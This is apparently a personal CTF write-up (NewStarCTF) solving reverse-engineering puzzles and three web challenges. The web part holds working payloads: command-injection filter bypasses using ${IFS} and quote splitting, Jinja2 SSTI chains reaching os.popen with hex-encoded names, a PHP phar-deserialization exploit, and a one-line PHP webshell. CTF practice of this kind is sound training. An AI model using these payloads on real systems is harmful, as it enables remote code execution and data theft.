(174条消息) Python gmpy2 mpz Methods_桃地睡不着的博客-CSDN博客(174条消息) Python gmpy2 mpz Methods_桃地睡不着的博客-CSDN博客
(174条消息) GMP库使用方法_play maker的博客-CSDN博客_gmp库
# ida 中发现的一些信息
GNU MP: Cannot reallocate memory (old_size=%lu new_size=%lu)
mpz(…)
mpz()返回一个设置为0的新mpz对象。
mpz(n) 从一个数值n返回一个新的mpz对象,如果n不是一个整数,它将被截断为一个整数。
mpz(s[, base=0]) 从一个由指定基数的数字组成的字符串s返回一个新的mpz对象。如果base=0,那么二进制、八进制或十六进制的Python字符串会被识别为前导0b、0o或0x字符。否则,字符串将被假定为十进制。基数的范围在2和62之间。
mpz_random(…)
mpz_random(random_state, n) 返回一个在0和n-1之间的均匀分布的随机整数。参数random_state必须先由random_state()创建。
mpz_rrandomb(…)
mpz_rrandomb(random_state, b)返回一个介于0和2b - 1之间的随机整数,在其二进制表示中具有长序列的0和1。参数random_state必须先由random_state()创建。
mpz_urandomb(…)
mpz_urandomb(random_state, b)返回一个在0和2b - 1之间的均匀分布的随机整数,参数random_state必须先由random_state()创建。
如上一波搜索,可以明确知道mpz 是个数学库,那么分析程序流程的时候,黑盒测试就有了侧重点。
0x02 程序分析
先ida简单分析一下
可以得到程序处理流程:
- 先将输入字符对应的hex,转化为小端序[v12]
v9=v12-114514
v9=v9*191980
v9=(v9//(2**20)<<20)+0xf6760
然后将v9与密文比较,也就是v13。
【注意:这里后面的三个表达式关系,需要动态调试。类似黑盒测试的方式得到,同时题目是mpz,可联想到gmp 数学函数库,会有一些帮助】
0x03 解密流程
下面是黑盒测试的用例【用来分析函数功能】
# 下面是,动态调试,分析函数功能用到的黑盒测试
# 12345678ABCDEFGHIJKLMNOPQRSTUVWXYZ 这是test 用例
enc='089A5657565554535251504F4E4D4C4B4A4948474645444342413837363534333231'
enc_=''
for i in range(len(enc)-2,-2,-2):
enc_+=enc[i:i+2]
num=int(enc_,16)
print(hex(num))
e='60677FE420496C8FB2D5F81B3F6285A8CBEE1135587B9EC1E407CB7E8AADD0F3163A1D90'
e_=''
for i in range(len(e)-2,-2,-2):
e_+=e[i:i+2]
num1=int(e_,16)
print(hex(num1))
print(num1//num)
enc='089A5657565554535251504F4E4D4C4B4A4948474645444342413837363534333231'
enc_=''
for i in range(len(enc)-2,-2,-2):
enc_+=enc[i:i+2]
num2=int(enc_,16)
print(hex(num2))
print(hex((num1//(2**20)<<20)+0xf6760))
分析清楚函数功能,开始解密:
# encoding=utf-8
enc='1853AA7A566DABCD46464646464646AA7F2C2D2D2D2D2D2D2D31C8AA8A5E738FE584092C01' # ida dump出的密文,将其小端序
enc_=''
for i in range(len(enc)-2,-2,-2):
enc_+=enc[i:i+2]
num=int(enc_,16)
# num=582872904048513552060243879638332414210812529746092910839742399777159917107350390592280
num=(num*(2**20)-0xf6760)>>20
num=num//191980
num+=114514
print(hex(num))
print(bytes.fromhex('666c61677b676d705f6c6c6c6c6c6c6c6c6c6c3131313131313131315f696e74217d')) # flag{gmp_llllllllll111111111_int!}
flag{gmp_llllllllll111111111_int!}
Web
So Baby RCE
0x01 绕过技巧
<?php
error_reporting(0);
if(isset($_GET["cmd"])){
if(preg_match('/et|echo|cat|tac|base|sh|more|less|tail|vi|head|nl|env|fl|\||;|\^|\'|\]|"|<|>|`|\/| |\\\\|\*/i',$_GET["cmd"])){
echo "Don't Hack Me";
}else{
system($_GET["cmd"]);
}
}else{
show_source(__FILE__);
}
(174条消息) CTFHub技能树笔记之RCE:命令注入、过滤cat、过滤空格_weixin_48799157的博客-CSDN博客_命令执行过滤空格
(174条消息) CTFWeb-命令执行漏洞过滤的绕过姿势_Tr0e的博客-CSDN博客_ctf 空格绕过
CTF中命令执行绕过方法 - FreeBuf网络安全行业门户
(174条消息) CTF下的命令执行_lemonl1的博客-CSDN博客_ctf 命令执行
CTF中的命令执行绕过方式 - 知乎 (zhihu.com)【比较全面】
参见上文:
# 一些绕过小技巧
1. cat
1.使用单引号绕过
127.0.0.1; c''at flag_2287214057241.php |base64
2.使用双引号绕过
127.0.0.1; c""at flag_2287214057241.php |base64
3.利用Shell 特殊变量绕过
127.0.0.1; ca$@t flag_2287214057241.php|base64
2.空格可以用以下字符代替:
< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等
$IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,因此这里加一个{}就固定了变量名。
同理,在后面加个$可以起到截断的作用,使用$9是因为它是当前系统shell进程的第九个参数的持有者,它始终为空字符串。
3.
a=fl;b=ag;cat $a$b 变量替换
cp fla{g.php,G} 把flag.php复制为flaG
ca${21}t a.txt 利用空变量 使用$*和$@,$x(x 代表 1-9),${x}(x>=10)(小于 10 也是可以的) 因为在没有传参的情况下,上面的特殊变量都是为空的
4.>,+过滤
对于 >,+ 等 符号的过滤 ,$PS2变量为>,$PS4变量则为+
5.控制环境变量绕过
$PATH => "/usr/local/….blablabla”
${PATH:0:1} => '/'
${PATH:1:1} => 'u'
${PATH:0:4} => '/usr'
6.过滤斜杠/绕过
使用${HOME:0:1}代替/
0x02 RCE
查询足够多资料后,开始RCE【通过cd .. 逐步跳转到 根目录】
/?cmd=ec$@ho${IFS}${PATH}
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
/?cmd=cd${IFS}..%0acd${IFS}..%0acd${IFS}..%0als${IFS}
bin
boot
dev
etc
ffffllllaaaaggggg
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
/?cmd=cd${IFS}..%0acd${IFS}..%0acd${IFS}..%0ac$@at${IFS}ffff$@llllaaaaggggg
flag{bcba8204-fad9-4328-9072-afeafd94d764}
flag{bcba8204-fad9-4328-9072-afeafd94d764}
BabySSTI_Two
0x01 测试黑名单
SSTI/沙盒逃逸详细总结-安全客 - 安全资讯平台 (anquanke.com)
细说Jinja2之SSTI&bypass - FreeBuf网络安全行业门户
?name={{1+1}} # + 过滤
/?name={{"hj"}} # "" 过滤
?name={{'~'}} # ~ 过滤
/?name={{'j s'}} # 空格过滤 单引号可以使用
?name={{'a.b'}} # . 可以使用
?name={{'a[]b'}} # [] 可以使用
?name={{'a()b'}} # () 可以使用
?name={{'()__'}} # __ 可以使用
?name={{'popen'}} # popen 过滤
?name={{lipsum.__globals__.__builtins__['__import__']('os').popen('ls').read()}}
# popen、eval、system 过滤
?name={{lipsum[request.args.t1][request.args.t2][request.args.t3]('os').popen('ls').read()}}&t1=__globals__&t2=__builtins__&t3=__import__
# 绕过 popen 通过 base64 编码 不可行
['cG9wZW4='.decode('base64')] #popen
['ZXZhbA=='.decode('base64')] #eval
("X19pbXBvcnRfXygnb3MnKS5wb3BlbignbHMnKS5yZWFkKCk=".decode('base64')) #__import__('os').popen('ls').read()
?name={{lipsum.__globals__.__builtins__['ZXZhbA=='.decode('base64')]("X19pbXBvcnRfXygnb3MnKS5wb3BlbignbHMnKS5yZWFkKCk=".decode('base64'))}}
?name={{joiner.__in''it__.__glob''als__.__bui''ltins__['__im''port__']('os').popen('ls').read()}}
# 可执行
?name={{[]['__c''lass__']['__ba''se__']['__subcl''asses__']()}}
# 利用脚本跑出利用函数位置
{{().__cl''ass__.__bas''es__[0].__su''bcl''asses__()[177].__in''it__.__glob''als__.__bu''iltins__['open']('ls').read()}}
?name={{[].__cla''ss__.__ba''se__.__subcla''sses__()[117].__in''it__.__glo''bals__['__built''ins__']['__imp''ort__']('os').__di''ct__['pop''en']('ls').read()}}
/?name={{''['__cla''ss__']['__bas''es__'][0]['__subcl''asses__']()[117]['__in''it__'].__glo''bals__['nepop'[::-1]]('id').read()}}
0x02 绕过测试
# __ 黑名单绕过
{{''.__class__}} => {{''[request.args.t1]}}&t1=__class__
# [] 绕过 getitem() 用来获取序号
"".__class__.__mro__[2]
"".__class__.__mro__.__getitem__(2)
# encoding=utf-8
str1 = 'popen'
res = ''
for i in str1:
res += "{0:c}"+"['format']({tmp})%2B".format(tmp=ord(i))
print(res[:-3])
for i in range(len(str1)):
print(str(hex(ord(str1[i]))),end=',') # \x70\x6f\x70\x65\x6e
popen 绕过失败
SSTI注入绕过(沙盒逃逸原理一样) - 冬泳怪鸽 - 博客园 (cnblogs.com)
?name={{lipsum.__glo''bals__.__bu''iltins__['ZXZhbA=='.decode('base64')]('X19pbXBvcnRfXygnb3MnKS5wb3BlbignbHMnKS5yZWFkKCk='.decode('base64'))}}
失败,不知道什么原因
https://blog.csdn.net/weixin_54515836/article/details/113778233
# 发现
166 <class 'warnings.catch_warnings'>
#调用commands进行命令执行
?name=
{{().__class__.__bases__[0].__subclasses__()[166].__init__.__globals__['__builtins__']['__import__']('commands').getstatusoutput('ls')}}
?name={{lipsum.__glo''bals__.__buil''tins__['__import__']('os').open('ereh_ni_galf/'[::-1],'r').read()}}
0x03 Rce success
尝试全hex 编码 ,数据构建脚本:
# encoding=utf-8
text = "{{''['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']['\x5f\x5f\x62\x61\x73\x65\x5f\x5f']['\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f']()[64]['\x5f\x5f\x69\x6e\x69\x74\x5f\x5f']['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f']['\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f']('\x6f\x73')['\x70\x6f\x70\x65\x6e']('c$@at${IFS}/fl$@ag_in_h3r3_52daad')['\x72\x65\x61\x64']()}}"
print(text.encode())
enc = "{{lipsum['__globals__']['__builtins__']['__import__']('os')['popen']('ls')['read']()}}"
i = 0
while i <= len(enc) - 1:
if enc[i] == "'":
print(enc[i], end='')
k = i + 1
while enc[k] != "'":
print('\\x' + str(hex(ord(enc[k])))[2:], end='')
k += 1
print(enc[k], end='')
i = k+1
continue
print(enc[i], end='')
i += 1
# 尝试全hex 编码
?name={{lipsum.__globals__.__builtins__['__import__']('os').popen('ls').read()}}
======> # 方便编码使用
?name={{lipsum['__globals__']['__builtins__']['__import__']('os')['popen']('ls')['read']()}}
======>
?name={{lipsum['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f']['\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f']('\x6f\x73')['\x70\x6f\x70\x65\x6e']('ls')['\x72\x65\x61\x64']()}}
name={{''['__class__']['__base__']['__subclasses__']()[64]['__init__']['__globals__']['__builtins__']['__import__']('os')['popen']('c$@at${IFS}/fl$@ag_in_h3r3_52daad')['read']()}}
====>
?name={{''['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']['\x5f\x5f\x62\x61\x73\x65\x5f\x5f']['\x5f\x5f\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73\x5f\x5f']()[64]['\x5f\x5f\x69\x6e\x69\x74\x5f\x5f']['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f']['\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f']('\x6f\x73')['\x70\x6f\x70\x65\x6e']('ls')['\x72\x65\x61\x64']()}}
# 发现成功读取 app.py
Welcome to NewStarCTF Again, Dear from flask import Flask, request
from jinja2 import Template
import re
app = Flask(__name__)
@app.route("/")
def index():
name = request.args.get('name', 'CTFer')
if not re.findall('class|init|mro|subclasses|flag|cat|env|"|eval|system|popen|globals|builtins|\+| |attr|\~', name):
t = Template("
# 读取根目录
'ls${IFS}/'
Welcome to NewStarCTF Again, Dear app
bin
boot
dev
etc
flag_in_h3r3_52daad
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
# getflag
'c$@at${IFS}/fl$@ag_in_h3r3_52daad'
?name={{lipsum['\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f']['\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f']['\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f']('\x6f\x73')['\x70\x6f\x70\x65\x6e']('c$@at${IFS}/fl$@ag_in_h3r3_52daad')['\x72\x65\x61\x64']()}}
Welcome to NewStarCTF Again, Dear flag{903247b8-92e5-49c0-b40a-b69c2fe2db43}
flag{903247b8-92e5-49c0-b40a-b69c2fe2db43}\
UnserializeThree
hint
PHP反序列化漏洞系列第三题。当文件上传遇到反序列化,擦出爱(RCE)的火花
0x01 题目分析
可以上传图片,并会返回访问路径。
在index页面,发现class.php,访问得到:
<?php
highlight_file(__FILE__);
class Evil{
public $cmd;
public function __destruct()
{
if(!preg_match("/>|<|\?|php|".urldecode("%0a")."/i",$this->cmd)){
//Same point ,can you bypass me again?
eval("#".$this->cmd);
}else{
echo "No!";
}
}
}
file_exists($_GET['file']);
详谈CTF中常出现的PHP反序列化漏洞 - FreeBuf网络安全行业门户
Phar (“Php ARchive”) 是PHP里类似于JAR的一种打包文件。如果你使用的是 PHP 5.3 或更高版本,那么Phar后缀文件是默认开启支持的,你不需要任何其他的安装就可以使用它。而Phar文件中也存在反序列化的利用点:phar文件会以序列化的形式储存用户自定义的meta-data,在执行Phar文件时meta-data中用户自定义的元数据将被反序列化从而达到反序列化攻击的目的,这也扩展了PHP反序列化攻击的攻击面
这一利用出自2018年Blackhat大会上的Sam Thomas分享的File Operation Induced Unserialization via the「phar://」Stream Wrapper这个议题.
该方法在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以不依赖unserialize()直接进行反序列化操作。
0x02 phar 反序列化漏洞利用
显然本题的考点就是 phar:// 反序列化漏洞了
浅析Phar反序列化 - FreeBuf网络安全行业门户
(174条消息) phar反序列化+两道CTF例题_Z3eyOnd的博客-CSDN博客_ctf phar反序列化
构建phar 文件(174条消息) disabled by the php.ini setting phar.readonly_weixin_34004750的博客-CSDN博客
PHP绕过 | Lazzaro (lazzzaro.github.io)
<?php
class Evil{
public $cmd="\r"."system('ls');";
}
$a = new Evil();
$phar = new Phar('test.phar',0,'test.phar');
$phar->startBuffering();
$phar->setStub('GIF89a<?php __HALT_COMPILER(); ?>');
$phar->setMetadata($a);
$phar->addFromString('text.txt','test');
$phar->stopBuffering();
#
$str="PHP_EOL";
$test1="\r";
$cmd=$test1."system('dir');";
// .urldecode("%0a");
eval('#'.$cmd);
生成phar 包后,改名上传,并获取路径。
Saved to: upload/0412c29576c708cf0155e8de242169b1.jpg
0x03 绕过验证
可以看到已经成功,phar 反序列化利用了。但是还需要绕过验证
if(!preg_match("/>|<|\?|php|".urldecode("%0a")."/i",$this->cmd)){
//Same point ,can you bypass me again?
eval("#".$this->cmd);
}else{
echo "No!";
}
// 在前面拼接了 # 注释符,同时 过滤换行
//PHP_EOL 可替代换行 但是php过滤了
// 由于php ? <> 等字符过滤
//php别名解析
//php3、php5、phtml能解析成php文件
//GIF89a?
<script language="ph%00p"> @eval($_REQUEST['pass']);
</script>
一番尝试后,发现回车"\r",与换行有相同作用,可以绕过,成功rce
public $cmd="\r"."system('ls');";
bin
boot
dev
etc
flag
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
# 得到flag
public $cmd="\r"."system('cat flag');";
flag{ba275b97-c9fe-4030-94a9-ef44a2dc3dc5}
flag{ba275b97-c9fe-4030-94a9-ef44a2dc3dc5}
Week5
Re
拔丝溜肆 (easy)
0x01 程序分析
main_
是个base64 加密:
这里值得注意的是,每次编码的时候,都使用源base64表移位获得。
所以,需要动调获得每次的移位值。
key = [0x29, 0x28, 0x39, 0xa, 0x3e, 0x1e, 0x3b, 0x19, 0x0c, 0x0, 0x2e, 0x3a, 0x1, 0x18]
直接通过每轮移位值,进行变表解编码得到flag。
0x02 base 变表解编码
# encoding=utf-8
print("x" * 42)
# 变表base
import base64
change_table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
str1 = 'CPaKBfUZFcNwW9qCKgyvuS2PGPQ9mttGc/wCNS0w6hDwGOSsOkOEkL5V'
key = [0x29, 0x28, 0x39, 0xa, 0x3e, 0x1e, 0x3b, 0x19, 0x0c, 0x0, 0x2e, 0x3a, 0x1, 0x18]
for i in range(0, len(str1), 4):
tmp=list(table)
new_table=[0]*64
for k in range(len(tmp)):
new_table[k]=tmp[(key[i//4]+k)%64]
change_table=''.join(new_table)
print(str(base64.b64decode(str1[i:i+4].translate(str.maketrans(change_table, table))))[2:2+3], end='')
# flag{12573882-1CF1-EB5E-C965-035B1F263C38}
flag{12573882-1CF1-EB5E-C965-035B1F263C38}
E4sy_Mix (hard)
0x01 smc 自修改
一般有两种方案解决:
直接动调让程序自己运行恢复【题目有debug,动态调试需绕过】。
idc 脚本,直接修改也能得到。
这里使用第一种,动态调试得到正确逻辑!【这种比较简单,同时可以得到一些运行数据,更容易求出flag】
修改逻辑,绕过即可。得到正常函数:
加密逻辑,很简单:
for ( i = 0; i < result; ++i )
{
v3 = (v3 + 1) % 256; // 右移1
v5 = byte_404490[v3];
v4 = (v5 + v4) % 256;
byte_404490[v3] = byte_404490[v4];
byte_404490[v4] = v5;
*(_BYTE *)(i + a1) ^= byte_404490[(unsigned __int8)(v5 + byte_404490[v3])];
}
0x02 py解密
# encoding=utf-8
print("x" * 33)
byte_404490=\
[ 0x61, 0x07, 0xD5, 0x8A, 0x69, 0x78, 0x2D, 0x56, 0xD1, 0x7C,
0x1E, 0x0E, 0x0C, 0x0F, 0x64, 0x30, 0x14, 0xC5, 0x3C, 0xB0,
0x37, 0x41, 0x1C, 0x17, 0x6A, 0xB5, 0x4A, 0xB9, 0x3D, 0x4D,
0xF2, 0xB7, 0x38, 0xB8, 0x7B, 0x9F, 0x48, 0x7F, 0xE5, 0xD2,
0xA8, 0xEE, 0xB3, 0x2F, 0xC1, 0x5A, 0xCE, 0x0B, 0x2A, 0x94,
0x50, 0xCA, 0x71, 0x72, 0xA9, 0xE1, 0x67, 0xDE, 0x28, 0x76,
0x31, 0x09, 0x3E, 0xE2, 0x3F, 0xA7, 0x20, 0xFE, 0x26, 0x42,
0x7A, 0xD9, 0x4C, 0xD6, 0x63, 0x23, 0x34, 0xC3, 0x08, 0x92,
0xAB, 0x18, 0x91, 0x3B, 0xAD, 0x1A, 0x4E, 0xA5, 0xF0, 0x83,
0xB6, 0x05, 0x77, 0xC7, 0xC6, 0x8E, 0x90, 0x5D, 0x19, 0x6D,
0x33, 0x1B, 0xF8, 0x45, 0xAC, 0x9A, 0x96, 0xA6, 0x79, 0xC0,
0x00, 0x02, 0xDB, 0x53, 0x68, 0x6B, 0x10, 0x6F, 0x98, 0xDF,
0x84, 0x0A, 0x47, 0x40, 0x13, 0xF3, 0xAF, 0x12, 0xBA, 0x8B,
0xD7, 0xCB, 0x9B, 0xF6, 0xC8, 0x9C, 0xE0, 0x01, 0x5B, 0xE3,
0xA2, 0x06, 0x03, 0xDA, 0x2E, 0x75, 0xC2, 0x74, 0xDD, 0xFB,
0xFD, 0xEA, 0xA1, 0x81, 0xBB, 0x65, 0x25, 0x44, 0xD8, 0x24,
0x39, 0xBF, 0x57, 0x0D, 0xEC, 0x70, 0xFC, 0xBD, 0x59, 0x4B,
0x49, 0x86, 0xCD, 0xE7, 0x73, 0xA0, 0x8D, 0x1D, 0xDC, 0x5E,
0x97, 0x87, 0xC9, 0xCC, 0x7D, 0x7E, 0x80, 0x16, 0xBC, 0xD3,
0xEB, 0xF4, 0x58, 0x51, 0x43, 0xF9, 0xCF, 0xBE, 0xF1, 0x66,
0xD4, 0xF7, 0x04, 0x5F, 0x21, 0xED, 0x32, 0xAE, 0x15, 0x27,
0xEF, 0x2C, 0xE9, 0x36, 0xFA, 0x5C, 0x29, 0x93, 0x35, 0x95,
0xE8, 0xA3, 0x52, 0x6E, 0x8F, 0xB4, 0xE4, 0x9D, 0xAA, 0x62,
0x3A, 0xA4, 0xD0, 0x4F, 0x8C, 0x46, 0x22, 0xB2, 0xB1, 0x89,
0x55, 0x9E, 0xFF, 0x11, 0xC4, 0x2B, 0x1F, 0xE6, 0x6C, 0x85,
0x60, 0xF5, 0x99, 0x88, 0x82, 0x54]
enc=[ 0xA1, 0xBF, 0xB6, 0x70, 0x63, 0x5B, 0x3B, 0xED, 0xF4, 0x91,
0x81, 0xA4, 0xBD, 0x3A, 0x53, 0x86, 0x5B, 0x8C, 0xDB, 0x41,
0x1B, 0x73, 0xE1, 0xD1, 0xF2, 0xB2, 0xDF, 0x6E, 0x16, 0x56,
0x22, 0x42, 0xFC]
v3 = 0
v4 = 0
flag=[0]*len(enc)
for i in range(len(enc)):
v3 = (v3 + 1) % 256 # 右移1
v5 = byte_404490[v3]
v4 = (v5 + v4) % 256
byte_404490[v3] = byte_404490[v4]
byte_404490[v4] = v5
flag[i]= byte_404490[(v5 + byte_404490[v3])&0xff]^enc[i]
for i in range(len(flag)):
print(chr(flag[i]),end='')
flag{RC4_and_SMC_is_interesting!}
最后附上idc python:
【直接Shift + F2 运行脚本,优点是,也能得到调试获得的结果,且便捷;缺点是,运行的数据获取不到,需要自己求解】
import ida_bytes
for ea in range(0x402000,0x402000+53,1):
ida_bytes.patch_dword(ea,ida_bytes.get_original_dword(ea)^0x54)
Petals Level Up (easy)
0x01 程序分析
__asm { jmp r15 }
# 发现上面内联 汇编指令,实现程序的跳转
处理方式就是动态调试【或者可以,自行计算出r15但显然比较麻烦】
0x02 程序动态调试跟进
这里对输入,有一次处理!
input 值在映射表中的位置,作为新值替代input:
映射表生成如下:
for ( i = 0; i <= 255; ++i )
*((_BYTE *)v3 + i) = ~(i ^ a2);
可以看到将输入 进行 移位 xor 操作【但是这里后面存在 jmp r15,所以需要查看汇编指令又进行了那些操作】
汇编跳转如下:
又进行了两次 移位 xor 运算:
【上面,移位4时,xor 0x7a,标注错了】
同时末尾,又xor input[i+1]。这里动态调试获得!
下面是密文比较: md5 ,加密小写提交
如上分析:就可以得到下面的加密流程: # 最后一轮 xor input[0]
*a1 = (*a1 << 7) | (*a1 >> 1);
*a1 ^= 0x71u;
*a1 = (*a1 << 6) | ((unsigned __int8)*a1 >> 2);
*a1 ^= 0x73u;
*a1 = (*a1 << 5) | (*a1 >> 3);
*a1 ^= 0x64u;
*a1 = (*a1 << 4) | ((unsigned __int8)*a1 >> 4);
*a1 ^= 0x7Au;
*a1 ^= *(a1+1)
0x03 解密py
先写出加密逻辑,进行测试:【与程序运行结果相同,说明分析正确】
# encoding=utf-8
enc=[0xB3, 0x79, 0xF1, 0x70, 0xB3, 0x79, 0xF1, 0x70, 0xB3, 0x31,
0xC3, 0x6E, 0x24, 0xE3, 0x7C, 0xFF, 0xDA, 0xF9, 0x75, 0xF2,
0x60, 0xBF, 0x33, 0xE3, 0x65, 0xA6, 0x62, 0x2A, 0x65, 0x24,
0xB4, 0xBA]
def RoL(num,bit):
return ((num<<bit)|(num>>(8-bit)))&0xff
# 生成映射表
table=[0]*256
len_=len(enc)
for i in range(256):
table[i]=(~(i^len_))&0xff
print(hex(table.index(ord('x'))))
test='1234567890987654321112345678abcd'
print(table)
flag=[0]*len(enc)
for i in range(len(test)):
tmp=table.index(ord(test[i]))
tmp = RoL(tmp, 7)
tmp ^= 0x71
tmp = RoL(tmp, 6)
tmp ^= 0x73
tmp = RoL(tmp, 5)
tmp ^= 0x64
tmp = RoL(tmp, 4)
tmp^=0x7a
if i != len(test)-1:
tmp^=table.index(ord(test[i+1]))
else:
tmp^=flag[0]
flag[i]=tmp
print(hex(tmp),end=',')
测试正确:写出解密逻辑,得到flag。
解密py:
# encoding=utf-8
import hashlib
enc=[0xB3, 0x79, 0xF1, 0x70, 0xB3, 0x79, 0xF1, 0x70, 0xB3, 0x31,
0xC3, 0x6E, 0x24, 0xE3, 0x7C, 0xFF, 0xDA, 0xF9, 0x75, 0xF2,
0x60, 0xBF, 0x33, 0xE3, 0x65, 0xA6, 0x62, 0x2A, 0x65, 0x24,
0xB4, 0xBA]
def RoR(num,bit):
return ((num>>bit)|(num<<(8-bit)))&0xff
# 生成映射表
table=[0]*256
len_=len(enc)
for i in range(256):
table[i]=(~(i^len_))&0xff
flag=[0]*len(enc)
flag[0]=enc[0]
for i in range(len(enc)-1,-1,-1):
if i == len(enc)-1:
tmp=flag[0]^enc[i]
else:
tmp=enc[i]^flag[i+1]
tmp^=0x7a
tmp=RoR(tmp,4)
tmp^=0x64
tmp=RoR(tmp,5)
tmp^=0x73
tmp=RoR(tmp,6)
tmp^=0x71
tmp=RoR(tmp,7)
flag[i]=tmp
print(tmp)
print(flag)
for i in range(len(flag)): #bakabakaba#AtsukoKagari#aw1dyq2r
print(chr(table[flag[i]]),end='')
print()
print(hashlib.md5('bakabakaba#AtsukoKagari#aw1dyq2r'.encode()).hexdigest())
flag{d5658c0b4c44d4672d76b563a8505a66}
【这题或许可以,静态修改跳转逻辑,使其能够F5 反汇编,可能会容易很多,不然分析汇编代码,容易漏掉细节,耗时大】
有时间可以尝试一下。
Virtual Self (middle)
0x01 VM opcode 转换为 可理解语句
特征很明显,是VM 类型题目。程序的加密逻辑是固定的,但是由于将其加密过程转化为未知 opcode 进行翻译。所以直觉上,运行规律是不可理解的。
那么现在就需要,将其opcode 码,转化为可理解的 伪汇编代码!!!
首先 用 idcpython 将 opcode dump出来:【动态调试 过程中dump】
import idaapi
start_address=0x00007FFC2B201890
end_address=0x00007FFC2B2021E0+1
data_length= end_address-start_address
data = idaapi.dbg_read_memory(start_address, data_length)
fp = open(r'F:\CTF_\CTF练习\2022_ctf\NewStarCTF 公开赛\week5\Re\Virtual Self (middle)\opcode', 'wb')
fp.write(data)
fp.close()
指令长度 为 4:
opcode[0]===>运算类型 如 mov sub add等
opcode[1]===>细分运算类型 如 mov 的不同用法类别
opcode[2]、opcode[3] 操作数
print 出可理解伪汇编:
# encoding=utf-8
import binascii
import hashlib
with open(r'F:\CTF_\CTF练习\2022_ctf\NewStarCTF 公开赛\week5\Re\Virtual Self (middle)\opcode', 'rb') as f:
opcode = f.read()
# opcode_=binascii.hexlify(opcode)
# print(opcode_)
opcode = bytes(opcode)
# 下面程序相当于将程序 vm 走了一遍。用python 代码
# opcode=[0]*((len(opcode_)//2))
# for i in range(0,len(opcode_),2):
# opcode[int(i//2)]=int(opcode_[i:i+2],16)
print('x' * 29)
i = 0
while opcode[i] != 0xff:
if opcode[i] == 224: # mov
if opcode[i + 1] == 0:
print("mov reg[", opcode[i + 2] - 208, "] ", "reg[", opcode[i + 3] - 208, "]")
elif opcode[i + 1] == 1:
print("mov reg[", opcode[i + 2] - 208, "] ", "input[", opcode[i + 3], "]")
elif opcode[i + 1] == 2:
print("mov input[", opcode[i + 2], "] ", "reg[", opcode[i + 3] - 208, "]")
print()
elif opcode[i + 1] == 3:
print("mov reg[", opcode[i + 2] - 208, "] ", opcode[i + 3])
elif opcode[i] == 162: # sub
if opcode[i + 1] == 1:
print("sub reg[", opcode[i + 2] - 208, "] ", opcode[i + 3])
elif opcode[i + 1] == 0:
print("sub reg[", opcode[i + 2] - 208, "] ", "reg[", opcode[i + 3] - 208, "]")
elif opcode[i] == 160: # xor
if opcode[i + 1] == 1:
print("xor reg[", opcode[i + 2] - 208, "] ", opcode[i + 3])
elif opcode[i + 1] == 0:
print("xor reg[", opcode[i + 2] - 208, "] ", "reg[", opcode[i + 3] - 208, "]")
elif opcode[i] == 161: # add
if opcode[i + 1] == 1:
print("add reg[", opcode[i + 2] - 208, "] ", opcode[i + 3])
elif opcode[i + 1] == 0:
print("add reg[", opcode[i + 2] - 208, "] ", "reg[", opcode[i + 3] - 208, "]")
i += 4
print("end !!!")
得到 伪汇编代码!
0x02 翻译后的伪汇编代码分析
# 运行上面脚本 即可得到【数据比较多,这里就不展示了】
翻译后得到上面伪汇编代码,逐个解密得到flag!
0x03 py解密
# encoding=utf-8
input = [0x84, 0x1F, 0x3C, 0x7B, 0xB9, 0x2A, 0x6C, 0x63, 0xA4,
0x72, 0x1B, 0x08, 0x76, 0x5F, 0x96, 0x88, 0x86, 0x5F, 0x7B,
0x67, 0xCD, 0x86, 0x97, 0x66, 0x64, 0x99, 0xFC, 0x7D, 0x81]
input[3] = (input[3] + 2) ^ 20 - 2
input[10] = input[10] ^ 97 ^ 3
input[17] = (input[17] ^ 3 + 2) ^ 1
input[22] = (input[22] ^ 230 ^ 1 - 2 + 252 + 2)
input[5] = (((((input[5] - 1) ^ 1 ^ 74 - 112) + 1 + 23) ^ 74) + 23)&0xff
input[0] = (((input[0] ^ 2 + 3) ^ 31 + 2) - 11 + 217) & 0xff
input[7] = ((input[7] + 6) ^ 2 + 1)
input[25] = ((input[25] + 4 - 2) ^ 1 - 128 + 78) & 0xff
input[23] = ((input[23] ^ 3 + 3 - 3) ^ 3 ^ 1 + 2)
input[14] = (input[14] - 228 - 1 + 249 + 249 + 1 + 3) & 0xff
input[19] = (input[19] + 1)
input[26] = (((input[26] ^ 3 + 9 - (58-79)) ^ 2 ^ 117)&0xff - 58) & 0xff
input[20] = (((input[20] - 4) ^ 1 - 4 - 4) ^ 2) & 0xff
input[2] = (input[2] + 24 + 3 - 244 - 2) & 0xff
input[18] = ((input[18] - 2 - 3) ^ 3 ^ 237 ^ 1 ^ 218)
input[4] = (((input[4] - 2 + 1) ^ (216 - 188) - 42 - 1) ^ 2) & 0xff
